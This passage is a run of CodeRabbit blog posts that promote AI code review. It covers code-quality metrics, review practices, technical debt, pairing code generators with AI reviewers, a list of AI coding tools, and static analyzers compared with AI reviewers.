Report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) analyzed 470 open-source PRs and found AI-co-authored PRs produce 10.83 issues per PR on average, compared to 6.45 for human-only PRs. As a result, reviewer fatigue compounds, bugs slip through, and coding conventions fade because nobody has time to enforce them. Eventually, a senior engineer leaves, and the team realizes nobody else knew what the conventions were. ## How to assess code quality (and know it's improving) Two metrics do the load-bearing work: cycle time and defect escape rate. Pick a baseline, watch the trend, and the rest sorts itself out. **Cycle time** is the time from when a PR opens to when it merges. It captures most of what goes wrong in review. If it's climbing week over week, something has shifted. PRs are getting bigger, reviewers are slower, or comments are stalling on low-priority issues instead of substance. Cycle time hides two distinct problems, and the diagnosis matters. Long time-to-first-review means reviewer capacity is the constraint, so the fix sits on the reviewing side: automate the first pass, distribute load, cap incoming PR size. Long time-in-review-cycles means feedback is unclear or comments stall on low-stakes issues, so the fix sits on the comment side: clearer review standards, written norms, prioritized blocking comments. Track cycle time at the team level, not the individual level. Compare against your own historical baseline rather than an industry number. **Defect escape rate** is the second metric worth watching. What percentage of bugs reach production instead of getting caught in review? Down means quality is improving. Up means something is broken upstream. If you don't tag bugs as "should have been caught" versus "genuinely subtle," start. The category split is where the actionable signal lives. Numbers tell you what happened, but qualitative signals tell you what's about to happen. Watch for: * **Reviewer complaints:** Senior engineers volunteering frustration about review load is a leading indicator before any metric moves. * **Author complaints:** Junior engineers saying their PRs sit too long is the same signal from the other end. * **Review skipping:** PRs getting merged without review during crunch weeks means quality is already breaking down upstream of anything you'd track. You know it's working when cycle time trends down or stays flat as PR volume grows, defect escape rate drops, first-review waits shrink, and senior engineers stop complaining about review burden. None of these are numbers you can hit overnight. They move on quarter-scale, not week-scale, and the most reliable way to read them is against your own history. ## Best practices to improve code quality without killing velocity Five practices move the needle on code quality the most, and none of them are new. The reason teams still ship buggy code is not that the practices are unknown; it's that the cost of executing them consistently has been higher than the cost of skipping them. ### 1. Keep PRs small Small PRs are one of the biggest levers on review quality. Long diffs invite skimming, and skimming is how bugs reach production. A change small enough to hold in your head lets a reviewer give substantive feedback instead of pattern-matching across a sprawling diff. [Google's engineering practices documentation](https://google.github.io/eng-practices/review/developer/small-cls.html) backs this up and gives reviewers explicit authority to reject changes solely for being too large. Smaller review units also reduce reviewer fatigue and move feedback through faster. ### 2. Adopt trunk-based development Trunk-based development is the practical enforcement layer for keeping PRs small. When everyone integrates into a shared trunk within a day or two, big speculative changes never get a chance to accumulate. Merge conflicts shrink, and reviewers see incremental work instead of multi-week dumps. Feature flags handle the parts that aren't ready to ship, so the team can keep merging without exposing half-built features to users. The combination gives you frequent, low-risk merges and keeps the team in the habit of reviewing fresh code instead of archaeology. ### 3. Automate testing Automated testing moves quality enforcement to the cheapest place to fix problems: before the code reaches a reviewer. A reliable suite of unit tests for logic, integration tests for boundary behavior, and a small set of end-to-end tests for critical paths catches the failures that would otherwise eat review time. Tests run in continuous integration (CI) on every PR, fail loudly, and block the merge until resolved. The point isn't 100% coverage; it's coverage on the paths that actually fail. Done right, human reviewers stop verifying basic correctness and start focusing on design, edge cases, and the failure modes the tests don't cover. ### 4. Layer static analysis and linting Static analysis and [linting](https://coderabbit.ai/blog/why-developers-hate-linters) belong in the pipeline as automated guardrails, not human checklists. Run them pre-commit or in CI so structural issues, type mismatches, common security patterns, and style violations get flagged before any reviewer sees the diff. The mechanical layer should catch the mechanical problems. A reviewer who has to comment on missing null checks or unused imports is spending cognitive load that should go toward design and logic. Combine the tools rather than picking one: * A linter for style * A type checker for correctness * A static application security testing (SAST) scanner Each catches a different class of issue, and the overlap is small. ### 5\. Standardize coding conventions Shared coding conventions remove the most predictable arguments from [code review](https://coderabbit.ai/blog/ai-code-reviews-boosting-dev-team-performance). Document the patterns your team agrees on: naming, file organization, error handling, testing structure, and what "done" actually means for a PR. Make as much of it machine-enforceable as you can. A formatter handles whitespace, while a PR template enforces the definition of done. The work of standardization happens once, and it pays out every time a reviewer doesn't have to explain a convention from scratch. When conventions live only in a senior engineer's head, drift is inevitable. But when they live in code and tooling, drift is hard. ![Freee logo with a bird icon and 'CodeRabbit CASE STUDY' text on a dark grid background.](https://victorious-bubble-f69a016683.media.strapiapp.com/free_7064ac3a6b.png) Together, these practices compound. [For example, freee](https://www.coderabbit.ai/case-studies/how-freee-saved-months-of-reviewer-time-coderabbit), a Tokyo-based business management SaaS company, saved the equivalent of 32.8 weeks of reviewer time over six months after pairing these practices with AI code review. The deployment expanded from a 30-seat pilot to 570 seats across 285 repositories. ## A practical code review checklist When the team agrees on what every reviewer should check, standards drift disappears. A useful checklist covers six things: * **Functionality:** Does the code do what it claims? Are edge cases handled? Are failure paths tested? * **Logic and correctness:** Conditional logic, error handling, null safety, and concurrency. These are the categories [CodeRabbit's State of AI vs Human report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) flags most heavily in AI-generated code. * **Readability:** Variable names, structure, and comments where complexity warrants them. Skip the formatting wars. Let the formatter handle those. * **Security:** Credential handling, input validation, and common injection patterns. Catch these in review, not in a post-mortem. * **Tests:** Does the test cover the behavior, not just the implementation? Do the tests fail when the code is wrong? * **Documentation:** Public APIs, non-obvious decisions, and breaking changes need a note. That's the human reviewer's job. Style, formatting, and obvious linting violations should be caught earlier in the pipeline. ## Designing code review for async, distributed teams The cost of async review is round count. Each back-and-forth eats a day, so the teams that ship across time zones optimize to land the review in one or two passes, not to be faster, but to require fewer rounds. Four practices keep the round count low: * **Pre-annotate non-obvious code in the PR description:** Walk the reviewer through the changes before they see the diff. The first round of "what is this doing?" should be answered before they ask. * **Make every comment self-contained:** Include the actual question and the actual ask. "Thoughts?" forces a follow-up. "Can we extract this into a helper to avoid duplicating the validation logic?" gets answered in one round. * **Mark comments as blocking vs. non-blocking:** Authors need to know which comments must be addressed before merge and which are suggestions. Without that signal, every round becomes a clarification round. * **Set a primary reviewer:** Multiple reviewers in different time zones, each waiting on the others, means PRs rot. Name one primary; mark the rest optional. The teams that handle this well treat async review as a design problem, not a scheduling problem. ![Taskrabbit logo with 'CodeRabbit CASE STUDY' text on a dark, textured background.](https://victorious-bubble-f69a016683.media.strapiapp.com/taskrabbit_e717eccec8.png) [Taskrabbit](https://www.coderabbit.ai/case-studies/taskrabbit-cut-merge-time-by-25-before-adopting-coding-agents) fixed exactly this before adopting AI coding agents. With engineering split between San Francisco and Poland, PRs opened after 2 pm PST waited a full day for the first review. After deploying CodeRabbit, the average PR cycle time dropped from 10 days to 7, a 25% reduction. Senior Engineering Manager Kiran Kanagasekar described the logic plainly: "Writing code faster was never the issue; the bottleneck was always code review." ## Putting it all together: AI code review and the sustainable quality workflow AI code review works as a first-pass filter that preserves human reviewer capacity for the decisions that actually need it. The categories AI handles well are the ones that wear humans out: catching null checks the author forgot, flagging unused imports, surfacing common security patterns, and spotting style inconsistencies. The categories where humans still win are the ones that require domain context: design, architecture, and the question of whether this change makes sense for what the team is actually trying to build. The split is clean: * **AI handles volume:** Null checks, unused imports, style consistency, and common security patterns. * **Humans handle judgment:** Design, architecture, system-level decisions where domain context is irreplaceable. That split is what makes the workflow sustainable. When a human reviewer opens a PR and the mechanical issues have already been flagged, they get to spend their attention on the questions worth asking. [CodeRabbit](https://www.coderabbit.ai/), the AI code review platform, runs this first pass everywhere developers work: pull requests, [IDEs (VS Code, Cursor, Windsurf)](https://coderabbit.ai/blog/how-we-built-our-ai-code-review-tool-for-ides), CLI, and mobile [code review through Slack](https://www.coderabbit.ai/agent). Every PR gets a walkthrough summary and a run of 40+ bundled linters and SAST tools inline before a human sees it. The standards-enforcement angle matters just as much. Teams encode their conventions once into CodeRabbit Learnings, Code Guidelines, or path-based rules, and CodeRabbit applies them during pull request reviews. The rules live in the review process instead of a Notion page nobody reads. Sustainable code quality comes from treating reviewer attention as a finite resource and building systems that protect it. The work happens in layers: pre-commit checks before the PR opens, AI review handling the first pass, humans focused on design and architecture, CI/CD validating the merge. Each layer catches what the previous one missed, and the combination keeps the team shipping quality code without grinding through the people who write it. Ready to make code review sustainable for your team? [Get a 14-day free trial](https://app.coderabbit.ai/login?free-trial) of CodeRabbit today.

Reduce Tech Debt: AI's Role in Efficient Coding

Aravind Putrevu — Mon, 15 Apr 2024 00:00:00 GMT

Developers that work on a coding project sometimes just go for the quick fix, racking up technical debt. It’s taking a shortcut now but ending up on a longer, bumpier road later. The code gets messy, hard to understand, or change. Before you know it, you’re spending more time fixing code than building new features. AI code reviews can stop tech debt from ever entering the codebase. A developer might write a shortcut, but the AI is there to fill in the gaps and build out the code so there's no technical debt to fix later. They make smarter decisions from the get-go, keeping your code clean and maintainable. That’s why they’re a game-changer in the world of coding. ## The rise of AI in code review and generation Gone are the days when code review was solely a labor-intensive task performed by human eyes. Today, AI-driven tools are transforming this critical phase of software development. They’re elevating the efficiency, accuracy, and overall quality of coding projects. Here is what AI-driven code review and generation bring to the table: * **Sophisticated algorithms:** AI-driven tools, using advanced algorithms, quickly detect syntax errors and complex structural issues. This approach significantly streamlines the time and effort that manual code review processes usually demand. * **Expert insight:** AI in code review offers insights and suggestions, enhancing code quality and ensuring consistency. It acts as an invaluable resource for developers seeking to refine and perfect their code. * **Continuous learning:** AI-driven code generation tools understand context, follow logical structures, and learn from previous codebases. Aside from automating parts of the coding process, it also innovates and improves upon existing coding practices. The adoption of AI in software development is fundamentally changing how we tackle coding tasks and manage projects. It’s a shift that enhances software development processes, leading to more efficient and innovative outcomes. You can see this transformation in several key areas: * **Reduced tech debt:** AI-driven tools ensure higher quality code, reducing future rework and associated costs. The result provides a more sustainable and manageable development lifecycle. * **Boosted developer productivity:** AI handles mundane tasks, freeing developers for complex programming. As an added bonus, it enhances morale and allows for a more creative and innovative approach to problem-solving. * **Standardization and consistency:** AI tools promote consistent coding practices, easing maintenance and debugging. The greater consistency leads to a more reliable and cohesive codebase, simplifying collaborative efforts across teams. The above advantages also set the stage for more strategic development tactics. With AI reducing technical debt, development teams can redirect their focus towards more innovative coding approaches. Developers that make this shift are freed from the repetitive cycle of routine maintenance and minor updates. ## Understanding AI code reviewers AI code reviewers are bringing efficiency and precision to a task traditionally characterized as time-consuming. To understand how these AI systems work, let’s dive into their operational mechanics and the advantages they offer over traditional code review methods. During an AI-enabled code review, machine learning algorithms analyze code amidst a vast array of rules. They are trained on large datasets of existing code, which helps them learn and recognize patterns, best practices, and even coding styles. When a developer submits code for review, the AI scans through it, much like a human reviewer would, but with the added ability to process and analyze large volumes of data at an unparalleled speed. Developers use code reviewers to check for syntax errors, potential bugs, security vulnerabilities, and adherence to coding standards. Incorporation with AI enables them to learn and adapt over time, enhancing their effectiveness and allowing them to become increasingly aligned with the specific coding practices of each project. Having this adaptability gives them several advantages over traditional review methods: * **Speed and efficiency:** Code reviews analyze vast amounts of code in a fraction of the time it would take a human, providing immediate feedback to developers. Their speed dramatically accelerates the development cycle * **Consistency:** Unlike humans, AI is not subject to fatigue or variability in performance. It consistently applies the same standards to every code review, ensuring uniform quality and adherence to best practices across the board * **Objectivity:** AI reviewers eliminate the subjective nature of human code reviews. Their feedback is based purely on data and learned patterns, reducing the potential for bias or misunderstanding * **Scalability:** As codebases grow and become more complex, AI-enabled tools become increasingly valuable. They’re able to handle the increased workload at scale, something that can be challenging and resource-intensive with traditional methods * **Continuous improvement:** AI systems continually learn from new code and patterns, making them progressively more effective over time. They adapt to emerging coding standards and practices, keeping the review process up-to-date * **Developer skill enhancement:** By providing consistent and immediate feedback, AI code reviewers serve as an educational tool for developers, helping them improve their coding skills and learn new best practices. An AI-enabled code review brings a level of efficiency, precision, and consistency previously unattainable with human-only review processes. They’re fostering a culture of continuous learning and quality improvement in coding practices. The end result is a higher quality of software development. ## Combating technical debt with AI Technical debt is an unavoidable reality. However, with the advent of AI tools, we now have a powerful ally to identify and mitigate this pervasive issue. AI's role in combating technical debt is proving to be transformative, offering powerful solutions to mitigate an issue that has long plagued software development. Technical debt, much like financial debt, accumulates over time — shortcuts in coding, delayed refactoring, or opting for quick fixes can lead to a codebase that's expensive to maintain and challenging to update. This is where AI steps in, offering a suite of solutions that are as effective as they are innovative. ### Early identification and prevention of tech debt [AI-powered static code analysis](https://resources.coderabbit.ai/blog/static-code-analyzers-vs-ai-code-reviewers-which-is-best) tools are highly effective at scanning code to identify problem areas, such as complex code blocks, code smells, or deviations from best practices. By pinpointing these issues early, they prevent the accumulation of technical debt. Another aspect is the AI's ability to analyze historical data, learning from past coding patterns and their outcomes. This predictive analysis can alert teams to potential debt-ridden areas in a codebase, even before they become a significant problem. Tools like CodeRabbit [use this approach](https://docs.coderabbit.ai/about/features#chat-with-coderabbit), offering intelligent suggestions based on a vast database of code. ### AI-driven refactoring and solution suggestions AI is highly effective at identifying problems and offering solutions. Some AI tools suggest code refactoring or even automate parts of the refactoring process. It takes a proactive approach, saves countless hours of manual labor, and reduces the risk of introducing new errors during the refactoring process. Moreover, AI is able to execute complex refactoring tasks with precision, adapting and refining the code to modern standards and practices. Dev teams keep their codebases lean, efficient, and future-proof, significantly reducing long-term technical debt. ## The future of coding using AI As AI-powered tools become more sophisticated and intertwined with development processes, we can expect a notable reduction in technical debt, leading to healthier, more manageable codebases. This shift will free up development teams to focus more on innovation and creative solutions, expanding the possibilities in software development. To delve deeper into how AI is transforming code reviews, "[AI and the Future of Code Reviews: A Deep Dive into CodeRabbit](https://docs.coderabbit.ai/blog/coderabbit-deep-dive?)" is an invaluable resource. If you’re interested in learning how to integrate these AI advancements into your development process and make technical debt a manageable aspect of your workflow, visit [CodeRabbit](https://coderabbit.ai/) for insightful strategies and solutions that are shaping the future of coding.

Maximizing Efficiency: Pairing Code Generators with AI Code Reviewers

Aravind Putrevu — Fri, 12 Apr 2024 00:00:00 GMT

Contrary to popular belief, the image of developers tirelessly coding day and night doesn't quite match reality. Most developers are focused on completing their projects as quickly as possible, not spending endless hours in front of an IDE. That means using whatever tools they can to maximize their efficiency. AI-driven code generators are part of the solution. Aside from speeding up the development process, they also make it more user-friendly and approachable for individuals across various skill levels. Still, there’s no guarantee that the code will be perfect. That's where AI code reviewers step in. They make sure quickly-churned code is also quality code. The pairing of these two AI tools together is reshaping how developers code. It’s enabling them to work smarter, not just faster. Using both AI code generation and AI code reviews strikes a balance between efficiency and excellence. ## The evolution of code generation technologies The history of code generation technologies follows a highly accelerated timeline. Initially, code generators were basic tools that automated repetitive coding tasks. Their primary aim was to save time and reduce the potential for human error. However, their capabilities were limited to what they were explicitly programmed to do. Fast forward to the present and you'll see a drastic transformation toward generative AI. Today's AI-powered code generators use sophisticated algorithms to learn from vast repositories of code what to generate. They’re able to predict and fulfill developer needs in real-time. We're talking about tools that understand context, anticipate requirements, and even suggest improvements – all while being seamlessly integrated into the developer's workflow. The brilliance of these current AI code generators lies in their ability to continuously learn and evolve. They draw on coding best practices and trends. The solutions they offer make junior-level code better and senior-level code faster. Within seconds, devs can stub out an API, assess the complexity of a for loop, and make sure the code actually fulfills the original [requirements.](https://docs.coderabbit.ai/guides/configure-coderabbit/) ### GitHub CoPilot example Let’s say a developer uses GitHub Copilot to write a Python function that calculates the factorial of a number. Let’s also say they’re using CodeRabbit for AI code reviews. Here’s how that might play out in this scenario: 1. **Starting the function:** The developer begins by typing a function definition in Python, like **def factorial(n):.** Upon entering this, GitHub Copilot might automatically suggest the rest of the function, recognizing the common pattern for calculating a factorial. 2. **Suggested code by GitHub Copilot:** def factorial(n): if n == 0: return 1 else: return n \* factorial(n-1) 3. **Use the function:** The developer can then use this function in their code to calculate factorials. For example, to calculate the factorial of 5, they would simply call **factorial(5).n** 4. **AI code review:** As part of its review capabilities, CodeRabbit might suggest improvements or identify issues. For example, if the original function didn’t handle negative inputs, CodeRabbit could recommend adding a check for this: def factorial(n): if n < 0: raise ValueError("Factorial is not defined for negative numbers") if n == 0: return 1 else: return n \* factorial(n-1) 5. **Facilitates workflow:** CodeRabbit.ai works alongside your existing development workflow, within the code hosting platform you use — like GitHub and GitLab. It analyzes code within pull requests, providing feedback directly on the pull request itself. You can even chat with CodeRabbit for real-time code discussion and clarification. In this example, GitHub Copilot assists in writing the initial code and CodeRabbit reviews and refines it. The revision makes sure it’s robust and handles edge cases like negative inputs. ## Benefits of AI code reviewers AI code reviewers are eagle-eyed code editors. They scan your code and leverage advanced algorithms to detect issues that might slip past the human eye. They’re constantly on the lookout for errors, inconsistencies, or even potential improvements. But they don’t just spot mistakes; they also make sure your code sticks to best practices and predefined coding standards. Developers that integrate AI code reviewers into their development process will gain a host of benefits that enhance their coding efficiency. Here are a few key advantages: * **Precision and thoroughness:** AI code reviewers bring precision and thoroughness to the table, qualities that often surpass human reviewers. They deliver unwavering accuracy, which is essential in projects where even the smallest errors can lead to significant consequences. This level of meticulousness and reliability in code review is invaluable in maintaining high standards of quality and efficiency. * **Consistent and objective:** AI is always steady and unbiased – it doesn’t have those off days or get upset about decisions from above. It approaches coding without any personal preferences, sticking solely to what it’s been trained on. Additionally, AI reviews every line of code uniformly, ensuring the same level of attention throughout. This consistent scrutiny is something really challenging to achieve when only humans are involved in the review process. * **Automating tedious tasks:** Code reviews can get a bit tedious with all the repetitive stuff like making sure the coding standards, documentation, and boilerplate code are on point. That's where AI steps in, handling these parts of the review automatically. This frees up the human reviewers to tackle the trickier, more nuanced parts of the code that really need a human touch. The result is a review process that moves along faster and it's less of a mental marathon for the human reviewers. * **Instantaneous feedback:** A big plus of using AI in code reviews is how it can analyze code and give feedback right away. This means developers get pointers in the thick of the code review discussion, not way later in the development cycle. Catching issues early on like this can really cut down on the hassle and expense of fixing bugs later. It’s all about nipping problems in the bud when they’re smaller and easier to handle. * **Learning and adaptation:** Advanced AI systems have the knack for learning from past reviews, the tweaks developers make, and the ever-changing world of coding practices. Thanks to this ability to learn and adapt, AI assistants get better and better over time, providing feedback that becomes increasingly relevant and on-point. * **Identify defects faster:** AI has the capability to swiftly sift through thousands of lines of code, pinpointing logical issues and complex security vulnerabilities with a precision that often matches or even exceeds what humans can spot. This efficiency lets human reviewers concentrate on more abstract aspects like architecture and design, rather than spending their time hunting for those hard-to-find errors. The integration of AI code reviewers into software development workflows will propel coding spaces to be more dependable, efficient, and team-friendly. They're spotting mistakes and building a world where quality, consistency, and sticking to standards are at the heart of every project. The idea of AI code generators and reviewers working together is like pairing a skilled artist with a meticulous art director. Each plays a distinct role, yet when combined, they enhance the entire creative process. By integrating code generation with AI review processes, you’re combining the innovative capacity to create code swiftly with the critical eye to refine and perfect it. For complex projects with multiple coding languages, an AI code generator could quickly create functional segments in various languages, while the AI reviewer could ensure that the code segment aligns with the project's standards and overall architecture. This collaboration saves time and significantly reduces the mental effort of the developer, allowing them to focus on the more arcane aspects of the project. ## Addressing the challenges of AI implementation in development Implementing AI in software development comes with its unique set of hurdles, but understanding these challenges and employing the right strategies can make integration smoother. Here's a breakdown: * **Compatibility issues:** Introducing AI into an established system might clash with legacy systems. It's like fitting new pieces into an old puzzle – some adjustments are needed. * **The learning curve:** Adopting AI tools requires your team to climb a steep learning curve. Ensuring everyone is up to speed is crucial for successful integration. * **Risk of over-reliance on AI**: Balancing AI tools with human expertise is essential. Too much dependence on AI can upset the balance between automated processes and human judgment. Having highlighted the key challenges of implementing AI in software development, let's shift our focus to navigating these obstacles. For strategies to weave these advanced tools into your existing systems effectively, consider the following: * **Start small:** Begin with less complex projects to allow your team to acclimate to the new tools without feeling overwhelmed. * **Choose the right fit:** Opt for AI tools that complement and integrate well with your current tech stack and workflows. * **Ongoing education and training:** Regular workshops and hands-on projects can keep your team adept at using AI tools effectively. * **Maintain a feedback loop:** Listen to your team's experiences and suggestions to guide further adjustments and enhance the integration process. Weaving AI into your software development process demands patience, strategic planning, and adaptability. When done effectively, it can lead to improvements in efficiency, innovation, and competitive advantage. ## Best practices for using AI in code development If you’re looking to implement AI into your code development, you’ll have to adapt your approach. Here are some tips for developers and teams to effectively harness the power of AI tools: * **Understand each tool’s capabilities:** Get to know the strengths and limitations of your AI tools. Understanding what they can and can’t do helps in setting realistic expectations and using them to their full potential. * **Enhance human skill, don’t replace it:** Use AI as an enhancement to your skills, not a replacement. It should aid your coding process without controlling it. * **Maintain quality standards:** AI can speed up coding, but don’t let it compromise the quality. Always ensure that the output meets your project's standards. * **Monitor and adjust processes**: Regularly assess how AI tools are impacting your workflows. Be open to tweaking processes for better efficiency. * **Prioritize data privacy and security:** As AI tools often process sensitive data, always prioritize data security and privacy in your coding practices. * **Plan for continuous integration:** Adopt an approach that allows for continuous integration of AI tools into your development process. It’s about staying adaptable and being ready to incorporate new AI capabilities as they emerge, ensuring your development process remains dynamic and future-proof. By following these best practices, developers and teams can optimize the use of AI in their code development, ensuring they stay ahead in the rapidly evolving world of technology. It's about balancing innovation with practicality and security, all while pushing the boundaries of what's possible in code development. CodeRabbit is at the forefront of redefining code review and analysis. Our sophisticated AI code review tools are expertly designed to synergize with leading code generators in the market. We refine and thoroughly analyze existing code, thereby guaranteeing superior quality and maximizing efficiency. CodeRabbit is not just adapting to current trends but is actively pioneering them. We invite you to join us in this innovative journey and discover how [CodeRabbit](https://coderabbit.ai/) can revolutionize your development workflow.

Top 5 AI Code Generation Tools

Aravind Putrevu — Thu, 11 Apr 2024 00:00:00 GMT

AI has significantly eased the coding process for professionals, streamlining complex tasks and enhancing efficiency. Now, even experienced developers can leverage AI to quickly generate code, boosting productivity and allowing more time for intricate problem-solving and innovation. Seasoned professionals can quickly stub out APIs in seconds. Beginners have a partner available 24/7 for code reviews and assessments. Even non-developers can release entire applications as long as they can sufficiently describe what they want in a prompt. There are several AI code generation tools on the market and new ones are appearing every day, each with unique features and capabilities. Let’s take a look at some of the best and most popular options. ![](https://framerusercontent.com/images/7ocezK3cnrQMYgBU3WNT8qAXg.png) ## 1\. CoPilot by GitHub Developed in collaboration with OpenAI, [CoPilot by GitHub](https://github.com/features/copilot) is a transformative code generator leveraging advanced language models like OpenAI's GPT-3 and Codex. It serves as more than just a coding assistant — it’s a virtual partner in programming. Here are its standout features: * **Seamless Integration with popular IDEs:** CoPilot sets itself apart with its integration into widely-used IDEs such as JetBrains, Neovim, Visual Studio, and Visual Studio Code. This integration facilitates a smooth coding experience, aiding in writing code, understanding complex codebases, and debugging. * **Predictive code generation:** At the heart of CoPilot's functionality is its predictive code generation, suggesting whole lines or blocks of code. This feature greatly accelerates the development process and is enhanced by its multilingual capability, thanks to training on a variety of public code repositories, which allows it to support numerous programming languages effectively. * **Adaptive learning and security detection:** GitHub’s Copilot doesn’t just follow a set pattern; it learns and adapts to individual coding styles, making its recommendations more personalized and accurate. It also includes the ability to detect security vulnerabilities, adding an extra layer of utility and safety to its coding assistance. Copilot is available in three subscription tiers, ranging from $10 for individuals to $39 for enterprises. It also offers complimentary access for students, teachers, and open-source project maintainers, making it accessible to a wide range of users. ## 2\. Replit GhostWriter [Replit GhostWriter](https://replit.com/ai) is an innovative tool designed to help programmers craft efficient, high-quality code. Here are its top three features that really make it stand out: * **Real-Time Coding Capabilities:** GhostWriter shines with its ability to autocomplete boilerplate code in real time as you type. This feature streamlines the coding process, making it faster and more efficient. * **Seamless Integration with Replit Online Code Editor:** The tool is flawlessly integrated into the Replit online code editor. This allows coders to write, execute, debug, and collaborate on code within a single, browser-based environment, greatly enhancing the overall coding workflow. * **Support for Over 16 Programming Languages:** GhostWriter is versatile, supporting a wide range of programming languages, including Python, JavaScript, Ruby, and more. This versatility is coupled with the ability to provide code explanations and comments, aiding developers in understanding and improving their code. Available in both Replit's Free and Core tiers, GhostWriter caters to various coding needs with both limited and advanced model options. ## 3\. Amazon CodeWhisperer Amazon’s [CodeWhisperer](https://aws.amazon.com/codewhisperer/) is a machine learning-powered service designed to assist developers in improving their productivity. By analyzing comments written in natural language and the existing code within an integrated development environment (IDE), CodeWhisperer offers relevant code recommendations. The key features that set it apart include: * **Open-source:** References suggestions from open-source data, granting easy access to relevant project repositories and licenses. * **Real-time interaction:** Offers real-time coding suggestions, from concise snippets to complete functions, leveraging insights from billions of lines of code. * **Enhances security:** Excels in identifying potential security vulnerabilities by using built-in security scans (detecting issues like exposed credentials and log injection). It provides instant solutions to these issues and aligns with top-tier security practices. For those seeking a more personalized coding experience, CodeWhisperer is adaptable to your unique requirements. It aligns with your internal libraries, APIs, and established best practices for more relevant code suggestions. Besides improving code quality, CodeWhisperer also speeds up the onboarding process of new developers by providing suggestions and resources that match your organization's standards. CodeWhisperer offers a free Individual tier, which includes comprehensive features like code suggestions, reference tracking, security scans, and conversational coding with AWS’ AI-powered assistant Amazon Q. For professional use, it’s available at $19 per month. ## 4\. Cody by Sourcegraph Powered by Claude 2, [Cody by Sourcegraph](https://sourcegraph.com/cody) offers a comprehensive suite of features to enhance the coding experience. What sets Cody apart is its deep integration with the codebase it works with, providing intelligent, context-aware suggestions that go beyond mere code completion. It's all open source. Cody uses a blend of Large Language Models (LLMs), Sourcegraph search capabilities, and extensive code expertise to achieve a seamless coding experience. Notable features of Cody by Sourcegraph include: * **Intelligent code completion:** Cody's AI predicts and offers relevant code snippets as you type, streamlining the coding process and boosting efficiency. * **Automated code reviews and bug fixing:** Cody excels at identifying potential bugs and suggesting fixes, greatly reducing debugging time and improving overall code quality. * **Universal compatibility:** Cody is designed to operate across all programming languages, making it a versatile tool for global business needs. * **Enhanced security:** With strong AWS encryption and adherence to SOC II database privacy standards, Cody ensures your data remains protected. Cody stands out for its ability to offer real-time code reviews, automated bug detection, and solutions, all while functioning seamlessly within your existing tech stack. Its chatbot feature, with full knowledge of your entire codebase, provides tailored code writing and refactoring based on natural language instructions. Additionally, Cody is also able to generate unit tests and documentation with a deep understanding of the entire codebase. Cody is also convenient. It offers a convenient extension for VS Code, serving as an efficient coding assistant seamlessly integrated into the IDE. For personal projects, individual developers can access Cody without charge. With Sourcegraph, Cody starts at $5k/year. ## 5\. Cursor [Cursor](https://cursor.sh/) stands out for its integration of AI directly into the code editing process, facilitating a unique pair-programming experience with AI. It doesn’t just generate code; it changes how developers interact with their projects and boosts their productivity. The AI-powered code editor also enhances the development workflow with a range of innovative features. Prominent Features of Cursor: * **AI-generated code and editing:** Offers advanced code generation capabilities, helping you code faster and with fewer errors * **AI assistance in terminal and lint fixes:** Streamlines your workflow with AI-powered debugging and automatic lint fixing * **Codebase-aware chatbot:** Provides helpful, context-aware interactions, offering insights and tailored answers directly related to your repository * **Simple migration and privacy options:** Easy migration from VS Code with a one-click setup and options for private code to maintain confidentiality * **Free plan available:** Accessible with a complimentary plan that includes AI-powered code editor and private data controls Cursor is not just another code editor; it’s a comprehensive AI assistant that understands your codebase and interacts intelligently with your projects. It streamlines and simplifies the coding process, whether you’re generating code from simple prompts, assisting in debugging, or providing direct references and documentation within the editor. Cursor effortlessly integrates with existing workflows, with emphasis on privacy and ease of use. Developers can subscribe to one of three tiers: Free, Pro ($20/month), or Business ($40/seat/month). ## The impact of AI is just beginning We've just scratched the surface with a few standout examples, but there's a lot more. AI code generators are just the beginning. There are countless other AI tools out there transforming how we code. As technology advances, we’re likely to see even smarter AI tools emerging. Their sudden popularity is changing how coding is done, making it into a more streamlined, error-proof process, opening doors for everyone, from coding wizards to beginners CodeRabbit is revolutionizing code review and analysis with our advanced AI code review tools. Tailored to complement the top tools in the market, we focus on enhancing and scrutinizing existing code, ensuring quality and efficiency. With our AI-first approach, we're not just following trends; we're setting them. Join us as we push the limits of AI in coding, and see how [CodeRabbit](https://coderabbit.ai/) can transform your development process.

Static code analyzers vs AI code reviewers: Which is Best?

Aravind Putrevu — Sat, 06 Apr 2024 00:00:00 GMT

Two of the most important tools modern developers rely on to improve their code are static code analyzers (SCAs) and [AI code reviewers.](https://www.coderabbit.ai/blog/how-coderabbits-agentic-code-validation-helps-with-code-reviews) Imagine you’re an author. Static code analyzers are like a trusted grammar book on your shelf, always ready to point out syntactical errors or discrepancies with well-established rules. It’s methodical, precise, and operates within the rules and best practices you and your team set for it. The AI code reviewer is more like a seasoned editor who understands the rules of grammar but also gets your unique style and the context of your work. As an AI-powered assistant, it can offer suggestions that delve into the realm of enhancing overall readability, structure, and even the logical flow of your narrative. Beginning developers may wonder which is the best ally for their coding endeavors, but today’s leading developers benefit from a harmonious collaboration between the two. ## Understanding static code analyzers SCAs perform thorough checks on your code. They analyze the source code's static elements, such as structure, syntax, and other components. They don't execute the code but examine it to ensure it's well-organized and adheres to set standards. Here is how the key features of these analyzers contribute to making your code more robust and reliable: * **Rule-based analysis:** Code analyzers operate based on predefined rules, focusing on finding syntax errors, potential bugs, and stylistic issues. It's like aligning your code with a best practices guide. * **Consistency enforcement**: They ensure coding standards are consistently followed across the project, promoting readability and maintainability. * **Early Bug detection**: By identifying issues early in the development process, they save time and resources in later stages. * **Security flaw identification:** Some analyzers are equipped to detect security vulnerabilities, safeguarding your code against potential threats. SCAs, with their thorough scrutiny and rule-based approach, serve as the first line of defense in code quality assurance. They highlight potential issues before the code goes live, acting as an essential preventative measure in the development process. Popular analysis tools include: SonarQube, Checkmarx, ESLint, Fortify SCA, and Coverity. They each specialize in different languages, offer different types of integrations, and focus on various aspects of software, such as the OWASP Top 10 or code smells. ### Common use cases SCAs are highly favored in environments where developers must carefully maintain code quality and follow coding standards. They're commonly used in large-scale projects and industries where software reliability is non-negotiable, like aerospace, automotive, and financial sectors. Additionally, SCAs are indispensable in industries where regulatory compliance is mandatory, as they help ensure that software adheres to stringent legal and safety standards. Developers find that SCAs enhance continuous integration and continuous deployment (CI/CD) pipelines, ensuring code quality is maintained and preventing new bugs during rapid development cycles. Additionally, they are invaluable in educational settings, assisting new programmers in learning and adhering to coding best practices from the outset. SCAs guard your code so it’s up to the mark, secure, and in good order. While they might not fully grasp the overarching goals of your project, they excel in precise adherence to coding standards, focusing intently on the minutiae of your code. ## SCA example SonarQube is probably the most popular SCA in the software industry. Its primary strength lies in its rule-based analysis, which 